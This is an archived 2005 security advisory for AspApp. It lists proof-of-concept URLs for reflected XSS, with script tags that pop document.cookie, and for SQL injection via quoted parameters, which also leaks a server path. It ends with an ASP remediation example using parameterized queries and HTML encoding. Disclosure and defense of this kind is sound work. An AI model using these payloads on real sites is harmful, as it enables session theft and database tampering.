AspApp.txt

2005-03-29T00:00:00
ID PACKETSTORM:36847
Type packetstorm
Reporter Diabolic Crab
Modified 2005-03-29T00:00:00

Description

                                        
`
Dcrab 's Security Advisory  
http://icis.digitalparadox.org/~dcrab  
http://www.hackerscenter.com/  
  
Severity: Medium  
Title: Multiple SQL injection and XSS vulnerabilities in AspApp.  
Date: March 30, 2005  
Vendor: AspApp  
Vendor site: http://www.localhost  
  
Summary:  
There are multiple SQL injection and XSS vulnerabilities in AspApp.  
  
Proof of Concept Exploits:  
  
http://localhost/content.asp?CatId=109&ContentType=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
http://localhost/content.asp?CatId='SQL_ERROR&ContentType=Company  
Sql error  
Microsoft VBScript runtime error '800a000d'  
  
Type mismatch: 'cLng'  
  
C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line 341  
  
  
http://localhost/content.asp?ContentId='SQL_ERROR  
Sql error  
Microsoft VBScript runtime error '800a000d'  
  
Type mismatch: 'cLng'  
  
C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line 341  
  
  
http://localhost/content.asp?contenttype=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
Pops cookie  
  
Possible fix: Using htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and other input validation functions before passing user input to the MySQL database, or before echoing data to the screen, would solve these problems.  
  
Author:  
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Look out for my soon-to-come-out book on secure coding with PHP.  
  
`
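
The "Possible fix" above names PHP functions; on the classic ASP (VBScript) platform shown in the error output, the counterparts are `Server.HTMLEncode` and ADO command parameters. The following is an added example, not code from the advisory or from AspApp; the `ReadId` helper, the `Application("ConnString")` setting and the `Content`/`Title` table and column names are hypothetical.

```vbscript
<%
Option Explicit

' ADO constants (values as defined in adovbs.inc)
Const adInteger = 3
Const adParamInput = 1

' Hypothetical helper: return a query-string value as a Long, or -1 when it is
' missing or not a plain run of digits. Checking before CLng avoids the unhandled
' "Type mismatch: 'cLng'" error page, which discloses the script path.
Function ReadId(name)
    Dim raw, re
    raw = Trim(Request.QueryString(name) & "")
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If re.Test(raw) Then
        ReadId = CLng(raw)
    Else
        ReadId = -1
    End If
End Function

Dim catId, contentType, conn, cmd, rs
catId = ReadId("CatId")
contentType = Request.QueryString("ContentType") & ""
If catId < 0 Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid CatId"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnString")   ' assumption: connection string stored here

' The value is bound as a typed parameter, never concatenated into the SQL text
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT Title FROM Content WHERE CatId = ?"   ' hypothetical table
cmd.Parameters.Append cmd.CreateParameter("@CatId", adInteger, adParamInput, , catId)
Set rs = cmd.Execute

' Encode request and database data before echoing it into HTML (reflected XSS)
Response.Write "<h1>" & Server.HTMLEncode(contentType) & "</h1>"
Do Until rs.EOF
    Response.Write "<p>" & Server.HTMLEncode(rs("Title") & "") & "</p>"
    rs.MoveNext
Loop
rs.Close : conn.Close
%>
```

The same pattern applies to the `ContentId` parameter; values echoed into an HTML attribute need `Server.HTMLEncode` as well, with the attribute always quoted.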